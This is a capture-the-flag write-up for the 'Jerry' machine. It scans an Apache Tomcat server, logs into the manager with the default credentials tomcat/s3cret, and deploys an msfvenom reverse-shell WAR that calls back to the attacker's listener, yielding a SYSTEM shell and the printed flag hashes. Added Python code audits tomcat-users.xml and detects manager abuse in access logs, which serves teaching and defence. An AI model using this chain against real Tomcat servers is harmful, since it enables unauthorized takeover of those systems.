# Jerry

![](/files/osOG0R3gSSaIe5b97bLg)

## Enumeration

As usual, we start with an nmap scan in order to find open ports on the target machine.

The following nmap command scans the whole port range of the target machine quickly and saves the output into a file:

> nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.95 -oN allPorts

* `-sS` use the **TCP SYN** scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
* `--min-rate 5000` nmap will try to keep the sending rate **at or above** 5000 packets per second.
* `-p-` scanning the entire port range, **from 1 to 65535**.
* `-T5` **insane** mode, the fastest of nmap's timing templates.
* `-Pn` assume the host is **online**.
* `-n` scan without reverse **DNS** resolution.
* `-oN` **save** the scan result into a file, in this case the *allPorts* file.

```
# Nmap 7.92 scan initiated Wed Jan  5 14:12:34 2022 as: nmap -sS -p- -T5 -Pn -n -oN allPorts 10.10.10.95
Nmap scan report for 10.10.10.95
Host is up (0.057s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT     STATE SERVICE
8080/tcp open  http-proxy

# Nmap done at Wed Jan  5 14:15:18 2022 -- 1 IP address (1 host up) scanned in 164.58 seconds
```

As we can see, port *8080* is the only open port. It looks like an HTTP service; let's try to obtain more information about the service and version running on it. The following command scans port *8080* in more depth and saves the result into a file:

> nmap -sC -sV -p8080 10.10.10.95 -oN targeted

* `-sC` performs the scan using the default set of **scripts**.
* `-sV` enables **version** detection.
* `-oN` **save** the scan result into a file, in this case the *targeted* file.

```
# Nmap 7.92 scan initiated Wed Jan  5 14:15:51 2022 as: nmap -p8080 -sCV -oN targeted 10.10.10.95
Nmap scan report for 10.10.10.95
Host is up (0.038s latency).

PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88
|_http-favicon: Apache Tomcat

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jan  5 14:16:02 2022 -- 1 IP address (1 host up) scanned in 10.51 seconds
```

So we have an *Apache Tomcat/Coyote JSP* server, version 7.0.88 according to the page title. If we open the page in a web browser, we see the Tomcat default page.

![](/files/jVtCi4sJ4xAI1MQicMDc)

At this point, we enumerate the web server's directories with gobuster.

> gobuster dir -u http://10.10.10.95:8080/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200

* `dir` enumerates **directories or files**.
* `-u` the **target** URL.
* `-w` path to the **wordlist**.
* `-t` number of **concurrent threads**, in this case 200 threads.

```
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.95:8080/
[+] Method:                  GET
[+] Threads:                 200
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/01/16 18:34:26 Starting gobuster in directory enumeration mode
===============================================================
/docs                 (Status: 302) [Size: 0] [--> /docs/]
/examples             (Status: 302) [Size: 0] [--> /examples/]
/manager              (Status: 302) [Size: 0] [--> /manager/] 
/con                  (Status: 200) [Size: 0]                 
/http%3A%2F%2Fwww     (Status: 400) [Size: 0]                 
/http%3A%2F%2Fyoutube (Status: 400) [Size: 0]                 
/http%3A%2F%2Fblogs   (Status: 400) [Size: 0]                 
/http%3A%2F%2Fblog    (Status: 400) [Size: 0]                 
/**http%3A%2F%2Fwww   (Status: 400) [Size: 0]                 
/External%5CX-News    (Status: 400) [Size: 0]                 
/http%3A%2F%2Fcommunity (Status: 400) [Size: 0]               
/http%3A%2F%2Fradar   (Status: 400) [Size: 0]                 
/http%3A%2F%2Fjeremiahgrossman (Status: 400) [Size: 0]        
/http%3A%2F%2Fswik    (Status: 400) [Size: 0]                 
                                                              
===============================================================
2022/01/16 18:40:14 Finished
===============================================================
```

## Exploitation

If we take a look at the */manager* directory, a login popup appears.

![](/files/VGB6Icsoj2NvdrffSPpW)

Let's try some common credentials, such as user `admin` with password `admin`.

![](/files/6H0iFR1fothzNCz92XLy)

We get a *403 Access Denied* message. If we look closely at the error page, it shows an example `tomcat-users.xml` entry containing default credentials.

![](/files/k3dmZf2qQyiixlacjtSq)

Now we have the user `tomcat` with the password `s3cret`. Let's refresh the page and enter the default credentials.

{% hint style="warning" %}
If you refresh the page and the *403 message* still appears, close the browser and open it again.
{% endhint %}
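From the defender's side, the file behind this login is Tomcat's `conf/tomcat-users.xml`. The following Python auditor is an added example, not part of the writeup: it parses such a file and flags entries that use the documentation's example credentials, have an empty password, or hold roles that allow WAR deployment through the manager. The sample file is constructed.

```python
import xml.etree.ElementTree as ET

# Credential pairs that Tomcat's documentation and its manager 403 page use as
# examples (tomcat/s3cret is the pair recovered above). Constructed starting
# list; extend it with whatever your own baseline considers weak.
DOC_EXAMPLE_CREDS = {
    ("tomcat", "s3cret"),
    ("tomcat", "tomcat"),
    ("admin", "admin"),
}
# Roles that allow deploying a WAR through the manager, i.e. code execution on the host.
DEPLOY_ROLES = {"manager-gui", "manager-script"}

def _local(tag):
    """Strip the XML namespace that newer tomcat-users.xml files declare."""
    return tag.rsplit("}", 1)[-1]

def audit_tomcat_users(xml_text):
    """Return (username, finding) tuples for risky <user> entries.
    Passwords stored as digests will not match the plaintext list."""
    findings = []
    for el in ET.fromstring(xml_text).iter():
        if _local(el.tag) != "user":
            continue
        name = el.get("username", "")
        password = el.get("password") or ""
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        if (name, password) in DOC_EXAMPLE_CREDS:
            findings.append((name, "documentation example credentials"))
        elif password == "":
            findings.append((name, "empty password"))
        deploy = roles & DEPLOY_ROLES
        if deploy:
            findings.append((name, "can deploy WARs via " + ", ".join(sorted(deploy))))
    return findings

# Constructed sample resembling the configuration Jerry must have had.
SAMPLE = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <user username="tomcat" password="s3cret" roles="manager-gui,manager-script"/>
  <user username="ops" password="ChangeMe!2022" roles="manager-status"/>
</tomcat-users>
"""

if __name__ == "__main__":
    for user, finding in audit_tomcat_users(SAMPLE):
        print(f"[!] {user}: {finding}")
```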

![](/files/47scFHQUhuvWuWVdAhBt)

![](/files/4Cu8x3tvZGd8hqQ1sbBd)

And we are in! The next step is to get a reverse shell. Looking at the manager page, we can see a *Deploy* section that lets us upload *WAR* files.

![](/files/t4a4176BN6iH5xOpvhTG)

{% hint style="info" %}
The following link explains what *WAR* files are:

<http://java.boot.by/wcd-guide/ch02s04.html>
{% endhint %}

At this point, the idea is to create a *WAR* payload with msfvenom, upload it to the web page, and get a reverse shell.

> msfvenom -p java/jsp\_shell\_reverse\_tcp lhost=10.10.14.14 lport=4444 -f war -o reverse\_shell.war

* `-p` indicates the type of **payload**.
* `lhost` local **host** IP.
* `lport` local **port** of the listener.
* `-f` output **format**.
* `-o` save the output to a **file**.

All we have to do is upload the payload and hit *Deploy*.

![](/files/HYi8sunFnKvDOaXhna3z)

Under the *Application* section, a new row should appear with the path of our uploaded payload.

![](/files/PkItmSaVDdSQTQd6qQne)

Finally, we set up a netcat listener on port 4444 and browse to the */reverse\_shell* path.

> nc -lvnp 4444

* `-l` **listen** mode.
* `-v` **verbose** mode.
* `-n` **numeric-only** IP, no DNS resolution.
* `-p` specify the **port** to listen on.

```
listening on [any] 4444 ...
connect to [10.10.14.14] from (UNKNOWN) [10.10.10.95] 49192
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\apache-tomcat-7.0.88>whoami
whoami
nt authority\system
```

The shell already runs as `nt authority\system`, so no privilege escalation is needed; all that is left is to collect the flags.

```
C:\apache-tomcat-7.0.88>type c:\users\administrator\desktop\flags\2*
type c:\users\administrator\desktop\flags\2*
user.txt
7004dbcef0f854e0fb401875f26ebd00

root.txt
04a8b36e1545a455393d067e772fe90e
```
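What this attack leaves behind in Tomcat's access log, as an added Python example that is not part of the writeup: it flags repeated manager authentication failures, a WAR deployment through the manager, and the first request to the context that appears only after the deployment. The log lines are constructed to mirror the steps above and use the default "common" log pattern.

```python
import re
from collections import defaultdict

# Tomcat AccessLogValve "common" pattern: %h %l %u %t "%r" %s %b
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)
# Manager endpoints that deploy a WAR: the HTML upload form and the text interface.
DEPLOY_ENDPOINTS = ("/manager/html/upload", "/manager/text/deploy")

def detect_manager_abuse(lines, fail_threshold=2):
    """Return alert strings for failed manager logins, deployments and
    the first hit on a context that appears only after a deployment."""
    failures = defaultdict(int)   # ip -> 401/403 responses under /manager/
    deployed = set()              # ips that completed a deployment
    known_contexts = set()        # top-level context paths seen so far
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue              # not in the expected format; skip it
        ip, user, ts, status = m["ip"], m["user"], m["ts"], int(m["status"])
        path = m["path"].split("?", 1)[0]       # drop the CSRF nonce etc.
        parts = path.split("/")
        context = "/" + parts[1] if len(parts) > 1 else path
        if path.startswith("/manager/") and status in (401, 403):
            failures[ip] += 1
            if failures[ip] == fail_threshold:
                alerts.append(f"{ip}: {fail_threshold} failed manager logins")
        if path in DEPLOY_ENDPOINTS and status == 200:
            deployed.add(ip)
            alerts.append(f"{ip}: user '{user}' deployed an application via {path} at {ts}")
        elif ip in deployed and context not in known_contexts:
            alerts.append(f"{ip}: first request to new context {context} after deploy")
        known_contexts.add(context)
    return alerts

# Constructed log lines modelled on the steps of this writeup (nonce is a placeholder).
SAMPLE_LOG = """\
10.10.14.14 - - [05/Jan/2022:14:18:02 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.14 - admin [05/Jan/2022:14:18:20 +0000] "GET /manager/html HTTP/1.1" 403 3446
10.10.14.14 - tomcat [05/Jan/2022:14:19:05 +0000] "GET /manager/html HTTP/1.1" 200 19321
10.10.14.14 - tomcat [05/Jan/2022:14:20:11 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=NONCE_PLACEHOLDER HTTP/1.1" 200 19877
10.10.14.14 - - [05/Jan/2022:14:20:40 +0000] "GET /reverse_shell/ HTTP/1.1" 200 -
"""

if __name__ == "__main__":
    for alert in detect_manager_abuse(SAMPLE_LOG.splitlines()):
        print("[!]", alert)
```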

